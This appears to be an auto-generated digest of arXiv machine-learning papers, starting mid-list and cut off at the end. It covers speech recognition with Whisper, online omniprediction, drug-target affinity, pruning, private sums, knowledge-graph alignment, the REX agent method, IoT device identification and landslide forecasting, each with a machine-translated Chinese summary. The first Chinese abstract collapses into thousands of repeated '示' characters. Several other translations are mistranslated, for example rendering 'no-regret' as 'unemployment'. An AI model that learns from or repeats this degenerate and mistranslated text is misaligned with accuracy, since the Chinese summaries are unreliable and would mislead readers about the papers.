repo_url: https://github.com/mtkresearch/clairaudience
paper_authors: Feng-Ting Liao, Yung-Chieh Chan, Yi-Chang Chen, Chan-Jan Hsu, Da-shan Shiu
for: 这 paper 是为了创建域专注的语音识别模型，利用文本域信息进行 Conditioning 生成。
methods: 这 paper 使用了精心调整的预训练、端到端模型（Whisper），通过示例示出学习域特定的示例来学习。
results: 这 paper 表明这种能力可以在不同的域和不同的示例上进行泛化，模型在未经见过的数据集上 achieve Word Error Rate (WER) 减少达 33%，并且通过文本Only fine-tuning 来实现域敏感和域适应。

Abstract
In this work, we propose a method to create domain-sensitive speech recognition models that utilize textual domain information by conditioning its generation on a given text prompt. This is accomplished by fine-tuning a pre-trained, end-to-end model (Whisper) to learn from demonstrations with prompt examples. We show that this ability can be generalized to different domains and even various prompt contexts, with our model gaining a Word Error Rate (WER) reduction of up to 33% on unseen datasets from various domains, such as medical conversation, air traffic control communication, and financial meetings. Considering the limited availability of audio-transcript pair data, we further extend our method to text-only fine-tuning to achieve domain sensitivity as well as domain adaptation. We demonstrate that our text-only fine-tuned model can also attend to various prompt contexts, with the model reaching the most WER reduction of 29% on the medical conversation dataset.

摘要
在这个工作中，我们提出了一种方法，用于创建域特定的语音识别模型，该模型利用文本域信息进行conditioning。这是通过练化一个预训练的、端到端模型（Whisper）来学习示例示唆。我们表明这种能力可以泛化到不同域和不同提示上下文中，我们的模型在未seen datasets上 achieved Word Error Rate（WER）下降达33%。考虑到语音-讲本数据的有限可用性，我们进一步扩展了我们的方法，使其能够在文本只 fine-tuning中实现域敏感性和域适应性。我们示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示示

Oracle Efficient Online Multicalibration and Omniprediction

paper_url: http://arxiv.org/abs/2307.08999
repo_url: None
paper_authors: Sumegha Garg, Christopher Jung, Omer Reingold, Aaron Roth
for: 这种研究的目的是为了研究在在线对抗 Setting中的 omniprediction 算法，以及其与多calibration 的关系。
methods: 这种研究使用了多calibration 和 omniprediction 两种概念，以及一些学习理论的概念。
results: 这种研究得到了一种新的在线多calibration 算法，可以在无限 benchmark 类 $F$ 中进行定义，并且是 oracle 有效的（即对于任何类 $F$, 算法可以转化为一种有效的减少 regret 学习算法）。此外，这种算法还可以在 linear functions 类 $F$ 中进行有效的实现。此外，这种研究还提供了 upper 和 lower bounds，用于评估这种算法的性能。

Abstract
A recent line of work has shown a surprising connection between multicalibration, a multi-group fairness notion, and omniprediction, a learning paradigm that provides simultaneous loss minimization guarantees for a large family of loss functions. Prior work studies omniprediction in the batch setting. We initiate the study of omniprediction in the online adversarial setting. Although there exist algorithms for obtaining notions of multicalibration in the online adversarial setting, unlike batch algorithms, they work only for small finite classes of benchmark functions $F$, because they require enumerating every function $f \in F$ at every round. In contrast, omniprediction is most interesting for learning theoretic hypothesis classes $F$, which are generally continuously large. We develop a new online multicalibration algorithm that is well defined for infinite benchmark classes $F$, and is oracle efficient (i.e. for any class $F$, the algorithm has the form of an efficient reduction to a no-regret learning algorithm for $F$). The result is the first efficient online omnipredictor -- an oracle efficient prediction algorithm that can be used to simultaneously obtain no regret guarantees to all Lipschitz convex loss functions. For the class $F$ of linear functions, we show how to make our algorithm efficient in the worst case. Also, we show upper and lower bounds on the extent to which our rates can be improved: our oracle efficient algorithm actually promises a stronger guarantee called swap-omniprediction, and we prove a lower bound showing that obtaining $O(\sqrt{T})$ bounds for swap-omniprediction is impossible in the online setting. On the other hand, we give a (non-oracle efficient) algorithm which can obtain the optimal $O(\sqrt{T})$ omniprediction bounds without going through multicalibration, giving an information theoretic separation between these two solution concepts.

摘要
最近的研究表明了 Multicalibration 和 Omniprediction 之间的意外联系，Multicalibration 是一种多组公平性概念，Omniprediction 是一种学习 парадиг，可以同时提供多种损失函数下的极小损失 garantías。先前的研究主要关注 Omniprediction 在批处理 setting 中。我们开始研究 Omniprediction 在在线对抗 setting 中。 existing 算法可以在在线对抗 setting 中获得 Multicalibration 的概念，但它们只适用于小型固定的 benchmark function 集合 $F$，因为它们需要在每个轮次中列出所有函数 $f \in F$。与此相比，Omniprediction 更加 interesseting，因为它可以学习理论上的假设类 $F$，这些类通常是无限大的。我们开发了一个新的在线 Multicalibration 算法，可以对无限 benchmark function 集合 $F$进行定义，并且是oracle efficient（即对于任何类 $F$，算法有形式的减少到一个不失业的学习算法 для $F$）。结果是首个 oracle efficient 的在线 omnipredictor，可以同时提供对所有 Lipschitz 几何损失函数的 no-regret garantías。对于 linear function 集合 $F$，我们说明了如何使我们的算法高效。此外，我们还提供了上下 bounds 的证明，其中我们的 oracle efficient 算法实际上承诺了更强的 guarantee called swap-omniprediction，并且我们证明了在在线 setting 中，不可能在 $O(\sqrt{T})$ 级别上获得 swap-omniprediction。相反，我们提供了一个（非oracle efficient）算法，可以在无需 Multicalibration 的情况下获得最佳 $O(\sqrt{T})$ omniprediction bound。这提供了一种信息理论上的分离，证明了这两个解决方案之间的不同。

GraphCL-DTA: a graph contrastive learning with molecular semantics for drug-target binding affinity prediction

paper_url: http://arxiv.org/abs/2307.08989
repo_url: None
paper_authors: Xinxing Yang, Genke Yang, Jian Chu
for: 预测药物与Target分子之间的吸附积分，以便在药物探索的初期阶段快速地评估新药的可能性。
methods: 我们提出了一种基于分子图的对比学习框架——GraphCL-DTA，通过这种框架，学习药物的分子图表示，保持分子图的 semantics。此外，我们还设计了一种新的损失函数，可以直接调整药物和目标表示的均匀性。
results: 我们在两个真实数据集（KIBA和Davis）上验证了GraphCL-DTA的效果，结果显示GraphCL-DTA在这些数据集上表现出色，较之前的状态艺模型而言，具有更高的准确率和更好的可靠性。

Abstract
Drug-target binding affinity prediction plays an important role in the early stages of drug discovery, which can infer the strength of interactions between new drugs and new targets. However, the performance of previous computational models is limited by the following drawbacks. The learning of drug representation relies only on supervised data, without taking into account the information contained in the molecular graph itself. Moreover, most previous studies tended to design complicated representation learning module, while uniformity, which is used to measure representation quality, is ignored. In this study, we propose GraphCL-DTA, a graph contrastive learning with molecular semantics for drug-target binding affinity prediction. In GraphCL-DTA, we design a graph contrastive learning framework for molecular graphs to learn drug representations, so that the semantics of molecular graphs are preserved. Through this graph contrastive framework, a more essential and effective drug representation can be learned without additional supervised data. Next, we design a new loss function that can be directly used to smoothly adjust the uniformity of drug and target representations. By directly optimizing the uniformity of representations, the representation quality of drugs and targets can be improved. The effectiveness of the above innovative elements is verified on two real datasets, KIBA and Davis. The excellent performance of GraphCL-DTA on the above datasets suggests its superiority to the state-of-the-art model.

摘要
药Target绑定亲和力预测在药物发现的早期阶段具有重要的作用，可以推断新药和新目标之间的亲和力强度。然而，先前的计算模型的性能受以下缺点限制。学习药物表示 rely only on supervised data, without considering the information contained in the molecular graph itself. In addition, most previous studies have designed complicated representation learning modules, while the uniformity of the representation quality is ignored. In this study, we propose GraphCL-DTA, a graph contrastive learning with molecular semantics for drug-target binding affinity prediction. In GraphCL-DTA, we design a graph contrastive learning framework for molecular graphs to learn drug representations, so that the semantics of molecular graphs are preserved. Through this graph contrastive framework, a more essential and effective drug representation can be learned without additional supervised data. Next, we design a new loss function that can be directly used to smoothly adjust the uniformity of drug and target representations. By directly optimizing the uniformity of representations, the representation quality of drugs and targets can be improved. The effectiveness of the above innovative elements is verified on two real datasets, KIBA and Davis. The excellent performance of GraphCL-DTA on the above datasets suggests its superiority to the state-of-the-art model.

Neural Network Pruning as Spectrum Preserving Process

paper_url: http://arxiv.org/abs/2307.08982
repo_url: None
paper_authors: Shibo Yao, Dantong Yu, Ioannis Koutis
for: 本研究旨在提出一种基于矩阵 спектル学习的神经网络减量方法，以提高神经网络在边缘设备上的运行效率。
methods: 本文使用矩阵 спектル学习来分析神经网络的训练过程，并提出一种基于矩阵减量的神经网络减量算法。
results: 实验结果表明，该算法可以更好地保留神经网络的重要参数，并提高神经网络在边缘设备上的运行效率。

Abstract
Neural networks have achieved remarkable performance in various application domains. Nevertheless, a large number of weights in pre-trained deep neural networks prohibit them from being deployed on smartphones and embedded systems. It is highly desirable to obtain lightweight versions of neural networks for inference in edge devices. Many cost-effective approaches were proposed to prune dense and convolutional layers that are common in deep neural networks and dominant in the parameter space. However, a unified theoretical foundation for the problem mostly is missing. In this paper, we identify the close connection between matrix spectrum learning and neural network training for dense and convolutional layers and argue that weight pruning is essentially a matrix sparsification process to preserve the spectrum. Based on the analysis, we also propose a matrix sparsification algorithm tailored for neural network pruning that yields better pruning result. We carefully design and conduct experiments to support our arguments. Hence we provide a consolidated viewpoint for neural network pruning and enhance the interpretability of deep neural networks by identifying and preserving the critical neural weights.

摘要
In this paper, we explore the close connection between matrix spectrum learning and neural network training for dense and convolutional layers, and argue that weight pruning is essentially a matrix sparsification process to preserve the spectrum. Based on this analysis, we propose a matrix sparsification algorithm tailored for neural network pruning that yields better pruning results.We carefully design and conduct experiments to support our arguments, providing a consolidated viewpoint for neural network pruning and enhancing the interpretability of deep neural networks by identifying and preserving the critical neural weights.

A Unifying Framework for Differentially Private Sums under Continual Observation

paper_url: http://arxiv.org/abs/2307.08970
repo_url: None
paper_authors: Monika Henzinger, Jalaj Upadhyay, Sarvagya Upadhyay
for: 本研究考虑了维护具有不同权重的汇总数据的权衡私钥性问题，即在不断观察时维护 differentially private 的汇总数据。
methods: 我们提出了一种通用框架和有效的算法来解决这个问题，其适用于任何足够平滑的函数。我们的算法是首个不具有多项式误差的权衡私钥性汇总数据算法。
results: 我们的算法可以在不断观察时维护 differentially private 的汇总数据，并且可以 precisley recover continual counting 问题中的误差（ Henzinger et al., SODA 2023）。我们的算法基于因子化机制，其误差取决于underlying matrix的 $\gamma_2$ 和 $\gamma_F$ 范数。我们给出了一个可构造的证明，证明了 $\gamma_2$ 和 $\gamma_F$ 范数的上界和下界。这是首次不同于所有非零元素都是相同的lower-triangular矩阵下的非тиrivial下界。

Abstract
We study the problem of maintaining a differentially private decaying sum under continual observation. We give a unifying framework and an efficient algorithm for this problem for \emph{any sufficiently smooth} function. Our algorithm is the first differentially private algorithm that does not have a multiplicative error for polynomially-decaying weights. Our algorithm improves on all prior works on differentially private decaying sums under continual observation and recovers exactly the additive error for the special case of continual counting from Henzinger et al. (SODA 2023) as a corollary. Our algorithm is a variant of the factorization mechanism whose error depends on the $\gamma_2$ and $\gamma_F$ norm of the underlying matrix. We give a constructive proof for an almost exact upper bound on the $\gamma_2$ and $\gamma_F$ norm and an almost tight lower bound on the $\gamma_2$ norm for a large class of lower-triangular matrices. This is the first non-trivial lower bound for lower-triangular matrices whose non-zero entries are not all the same. It includes matrices for all continual decaying sums problems, resulting in an upper bound on the additive error of any differentially private decaying sums algorithm under continual observation. We also explore some implications of our result in discrepancy theory and operator algebra. Given the importance of the $\gamma_2$ norm in computer science and the extensive work in mathematics, we believe our result will have further applications.

摘要
我们研究维护具有泛化隐私衰减的总和问题在不断观察下。我们提供一个统一的框架和高效的算法来解决这个问题，该算法适用于任何足够光滑的函数。我们的算法是第一个不具有多项式误差的泛化隐私总和算法。我们的算法超越了所有以前的泛化隐私总和算法，并在特殊情况下 recover exactly Henzinger et al.（SODA 2023）中的添加误差。我们的算法是一种因子化机制的变体，其误差取决于underlying矩阵的$\gamma_2$和$\gamma_F$范数。我们提供了一种可构造的证明，证明了一个非常接近的上界和下界，其中下界适用于一类lower-triangular矩阵。这是第一个不同于所有非零非同样的非零元素的下三角矩阵的下界。它包括所有不断观察下的总和问题矩阵，从而得到了任何泛化隐私总和算法的添加误差的Upper bound。我们还探讨了我们结果在不同误差理论和运算代数方面的应用。由于计算机科学中的$\gamma_2$范数的重要性以及数学领域的广泛工作，我们认为我们的结果将有更多应用。

AutoAlign: Fully Automatic and Effective Knowledge Graph Alignment enabled by Large Language Models

paper_url: http://arxiv.org/abs/2307.11772
repo_url: None
paper_authors: Rui Zhang, Yixin Su, Bayu Distiawan Trisedya, Xiaoyan Zhao, Min Yang, Hong Cheng, Jianzhong Qi
For: The paper is written for the task of entity alignment between knowledge graphs (KGs), specifically proposing a fully automatic method that does not require manually crafted seed alignments.* Methods: The method proposed in the paper is called AutoAlign, which uses predicate embeddings and entity embeddings to align entities between two KGs. Specifically, AutoAlign constructs a predicate-proximity-graph with the help of large language models to automatically capture the similarity between predicates across two KGs, and shifts the two KGs’ entity embeddings into the same vector space by computing the similarity between entities based on their attributes.* Results: The paper reports that AutoAlign improves the performance of entity alignment significantly compared to state-of-the-art methods, as demonstrated through experiments using real-world KGs.

Abstract
The task of entity alignment between knowledge graphs (KGs) aims to identify every pair of entities from two different KGs that represent the same entity. Many machine learning-based methods have been proposed for this task. However, to our best knowledge, existing methods all require manually crafted seed alignments, which are expensive to obtain. In this paper, we propose the first fully automatic alignment method named AutoAlign, which does not require any manually crafted seed alignments. Specifically, for predicate embeddings, AutoAlign constructs a predicate-proximity-graph with the help of large language models to automatically capture the similarity between predicates across two KGs. For entity embeddings, AutoAlign first computes the entity embeddings of each KG independently using TransE, and then shifts the two KGs' entity embeddings into the same vector space by computing the similarity between entities based on their attributes. Thus, both predicate alignment and entity alignment can be done without manually crafted seed alignments. AutoAlign is not only fully automatic, but also highly effective. Experiments using real-world KGs show that AutoAlign improves the performance of entity alignment significantly compared to state-of-the-art methods.

摘要
知识 graphs (KGs) 的实体对应问题的任务是将两个不同 KGs 中的实体对应到同一个实体。许多机器学习基于方法已经被提出来解决这个问题。然而，我们所知道的是，现有的方法都需要手动制作的种子对应，这是贵重的。在这篇论文中，我们提出了第一个完全自动对应方法，名为 AutoAlign，不需要任何手动制作的种子对应。特别是，对于 predicate 嵌入，AutoAlign 使用大型自然语言模型来自动捕捉两个 KGs 中 predicate 之间的相似性。对于实体嵌入，AutoAlign 先使用 TransE 来独立计算每个 KG 中的实体嵌入，然后通过计算实体之间的属性相似性来将两个 KGs 的实体嵌入Shift到同一个向量空间中。因此， predicate 对应和实体对应都可以不需要手动制作种子对应。AutoAlign 不仅是完全自动的，还非常有效。使用实际世界 KGs 的实验表明，AutoAlign 在对entity alignment进行比对state-of-the-art方法时有显著改进。

Landscape Surrogate: Learning Decision Losses for Mathematical Optimization Under Partial Information

paper_url: http://arxiv.org/abs/2307.08964
repo_url: https://github.com/facebookresearch/lancer
paper_authors: Arman Zharmagambetov, Brandon Amos, Aaron Ferber, Taoan Huang, Bistra Dilkina, Yuandong Tian
for: 优化问题中的部分观察或通用优化器表现不佳，学习一个优化器 $\mathbf{g}$ 来解决这些问题，可以快速加速优化过程，并且可以利用过去经验。
methods: 使用一个可学习的地形代理 $M$ 来取代 $f\circ \mathbf{g}$，这个地形代理可以更快速地计算，提供稠密和平滑的梯度，可以泛化到未看到的优化问题，并通过分布式优化来高效地学习。
results: 在 sintetic 问题和实际问题上测试了我们的方法，比如短路和多维零链包，和股票配置优化，与状态 искусственный基线相比，我们的方法可以达到相同或更高的目标值，同时减少了对 $\mathbf{g}$ 的调用数量。特别是，我们的方法在高维ensional computationally expensive 问题上表现出色。

Abstract
Recent works in learning-integrated optimization have shown promise in settings where the optimization problem is only partially observed or where general-purpose optimizers perform poorly without expert tuning. By learning an optimizer $\mathbf{g}$ to tackle these challenging problems with $f$ as the objective, the optimization process can be substantially accelerated by leveraging past experience. The optimizer can be trained with supervision from known optimal solutions or implicitly by optimizing the compound function $f\circ \mathbf{g}$. The implicit approach may not require optimal solutions as labels and is capable of handling problem uncertainty; however, it is slow to train and deploy due to frequent calls to optimizer $\mathbf{g}$ during both training and testing. The training is further challenged by sparse gradients of $\mathbf{g}$, especially for combinatorial solvers. To address these challenges, we propose using a smooth and learnable Landscape Surrogate $M$ as a replacement for $f\circ \mathbf{g}$. This surrogate, learnable by neural networks, can be computed faster than the solver $\mathbf{g}$, provides dense and smooth gradients during training, can generalize to unseen optimization problems, and is efficiently learned via alternating optimization. We test our approach on both synthetic problems, including shortest path and multidimensional knapsack, and real-world problems such as portfolio optimization, achieving comparable or superior objective values compared to state-of-the-art baselines while reducing the number of calls to $\mathbf{g}$. Notably, our approach outperforms existing methods for computationally expensive high-dimensional problems.

摘要
现代学习整合优化技术已经在部分 observable 的优化问题或通用优化器无需专家调整时表现出了搭配性。通过学习一个优化器 $\mathbf{g}$，以便在 $f$ 作为目标函数下解决这些复杂的问题，优化过程可以大幅加速。可以通过知识到的优化解决方案或间接地将 $f\circ \mathbf{g}$ 作为整合函数来训练优化器。 indirect approach 可能不需要优化解决方案作为标签，并且可以处理问题不确定性，但是它在训练和部署时间较慢，因为在训练和测试中频繁地调用优化器 $\mathbf{g}$。训练还面临着 $\mathbf{g}$ 的稀疏梯度问题，特别是对 combinatorial 解决器。为解决这些挑战，我们提出使用一个缓和可学习的景观准则 $M$，作为 $f\circ \mathbf{g}$ 的替代品。这个准则可以通过神经网络学习，在训练时间更快，提供稠密和平滑的梯度，可以泛化到未见优化问题，并通过相关优化来有效地学习。我们在 sintetic 问题和实际问题上进行了测试，包括短路和多维锦包，并取得了与状态艺术基准相同或更高的目标值，同时减少了对 $\mathbf{g}$ 的调用数量。特别是，我们的方法在高维计算成本高的问题上表现出色。

REX: Rapid Exploration and eXploitation for AI Agents

paper_url: http://arxiv.org/abs/2307.08962
repo_url: None
paper_authors: Rithesh Murthy, Shelby Heinecke, Juan Carlos Niebles, Zhiwei Liu, Le Xue, Weiran Yao, Yihao Feng, Zeyuan Chen, Akash Gokul, Devansh Arpit, Ran Xu, Phil Mui, Huan Wang, Caiming Xiong, Silvio Savarese
for: 提高AI代理的快速探索和尝试能力，解决现有AutoGPT风格技术的缺陷，如偏重精确描述的决策和缺乏有系统的尝试和失败处理方式。
methods: 提出一种增强的Rapid Exploration and eXploitation（REX）方法，通过添加奖励层和基于Upper Confidence Bound（UCB）的概念，使AI代理性能更加稳定和高效。REX方法不需要模型细化，可以利用日志数据，并与现有基础模型协作无缝。
results: Comparative analysis表明，使用REX方法可以与现有方法（如Chain-of-Thoughts（CoT）和Reasoning viA Planning（RAP））相比，在一些情况下甚至超越其表现，同时具有显著减少执行时间的优点，提高了在多样化场景下的实际应用性。

Abstract
In this paper, we propose an enhanced approach for Rapid Exploration and eXploitation for AI Agents called REX. Existing AutoGPT-style techniques have inherent limitations, such as a heavy reliance on precise descriptions for decision-making, and the lack of a systematic approach to leverage try-and-fail procedures akin to traditional Reinforcement Learning (RL). REX introduces an additional layer of rewards and integrates concepts similar to Upper Confidence Bound (UCB) scores, leading to more robust and efficient AI agent performance. This approach has the advantage of enabling the utilization of offline behaviors from logs and allowing seamless integration with existing foundation models while it does not require any model fine-tuning. Through comparative analysis with existing methods such as Chain-of-Thoughts(CoT) and Reasoning viA Planning(RAP), REX-based methods demonstrate comparable performance and, in certain cases, even surpass the results achieved by these existing techniques. Notably, REX-based methods exhibit remarkable reductions in execution time, enhancing their practical applicability across a diverse set of scenarios.

摘要
在这篇论文中，我们提出了一种改进后的快速探索和努力（Rapid Exploration and eXploitation，REX）方法，用于AI代理。现有的AutoGPT样式技术存在一定的限制，如准确描述的重要性和RL的缺乏系统化适应。REX增加了一层奖励，并将Upper Confidence Bound（UCB）类概念纳入方法中，从而使AI代理表现更加稳定和高效。这种方法具有使用日志中的假日行为，无需模型细化而可以与现有基础模型集成，并且在比较分析中与现有方法（Chain-of-Thoughts（CoT）和Reasoning viA Planning（RAP）） demonstrate了相似或者甚至超过其表现。尤其是，REX基本方法在执行时间方面具有显著的减少，使其在多样化的情况下更加实用。

Discretization-based ensemble model for robust learning in IoT

paper_url: http://arxiv.org/abs/2307.08955
repo_url: None
paper_authors: Anahita Namvar, Chandra Thapa, Salil S. Kanhere
for: 提高 IoT 设备识别模型的安全性，抵御黑盒和白盒攻击。
methods: integrate discretization techniques and ensemble methods to improve the robustness of machine learning models for IoT device identification.
results: 提高了 ML 模型对 IoT 设备识别的可靠性和安全性，抵御了黑盒和白盒攻击。

Abstract
IoT device identification is the process of recognizing and verifying connected IoT devices to the network. This is an essential process for ensuring that only authorized devices can access the network, and it is necessary for network management and maintenance. In recent years, machine learning models have been used widely for automating the process of identifying devices in the network. However, these models are vulnerable to adversarial attacks that can compromise their accuracy and effectiveness. To better secure device identification models, discretization techniques enable reduction in the sensitivity of machine learning models to adversarial attacks contributing to the stability and reliability of the model. On the other hand, Ensemble methods combine multiple heterogeneous models to reduce the impact of remaining noise or errors in the model. Therefore, in this paper, we integrate discretization techniques and ensemble methods and examine it on model robustness against adversarial attacks. In other words, we propose a discretization-based ensemble stacking technique to improve the security of our ML models. We evaluate the performance of different ML-based IoT device identification models against white box and black box attacks using a real-world dataset comprised of network traffic from 28 IoT devices. We demonstrate that the proposed method enables robustness to the models for IoT device identification.

摘要
互联网物联网设备识别是将连接到网络的互联网设备识别和验证的过程。这是确保只允许授权的设备访问网络的 essencial 过程，并对网络管理和维护是必需的。在过去几年中，机器学习模型广泛用于自动化网络中设备识别的过程。然而，这些模型容易受到恶意攻击的影响，这可能会降低其精度和有效性。为了更好地安全设备识别模型，精度技术可以减少机器学习模型对恶意攻击的敏感度，从而提高模型的稳定性和可靠性。此外，组合多种不同的模型可以减少剩下的噪音或错误的影响。因此，在这篇论文中，我们将精度技术和组合方法结合使用，并对其在模型对恶意攻击的Robustness进行评估。即我们提出了一种基于精度的集成堆叠技术，以提高互联网设备识别模型的安全性。我们使用了一个实际的网络流量数据集，包含28个互联网设备的网络流量，对不同的机器学习基于互联网设备识别模型进行了白盒和黑盒攻击的评估。我们的结果表明，我们的提议的方法可以提高互联网设备识别模型的Robustness。

Knowledge-infused Deep Learning Enables Interpretable Landslide Forecasting

paper_url: http://arxiv.org/abs/2307.08951
repo_url: None
paper_authors: Zhengjing Ma, Gang Mei
for: 预测山崩发展和失败的可能性是一项复杂的任务，因为它们受到许多内部和外部因素的影响。
methods: 这篇文章使用了一种名为LFIT的转换器基本深度学习网络，该网络可以学习非线性关系，并且具有可读性和多源数据处理能力。
results: 文章表明，通过结合先前知识，可以提高整体山崩预测，并且可以捕捉不同地区的山崩行为和时间模式。通过使用塑形变形观测数据，文章验证了该方法的可靠性和可读性。

Abstract
Forecasting how landslides will evolve over time or whether they will fail is a challenging task due to a variety of factors, both internal and external. Despite their considerable potential to address these challenges, deep learning techniques lack interpretability, undermining the credibility of the forecasts they produce. The recent development of transformer-based deep learning offers untapped possibilities for forecasting landslides with unprecedented interpretability and nonlinear feature learning capabilities. Here, we present a deep learning pipeline that is capable of predicting landslide behavior holistically, which employs a transformer-based network called LFIT to learn complex nonlinear relationships from prior knowledge and multiple source data, identifying the most relevant variables, and demonstrating a comprehensive understanding of landslide evolution and temporal patterns. By integrating prior knowledge, we provide improvement in holistic landslide forecasting, enabling us to capture diverse responses to various influencing factors in different local landslide areas. Using deformation observations as proxies for measuring the kinetics of landslides, we validate our approach by training models to forecast reservoir landslides in the Three Gorges Reservoir and creeping landslides on the 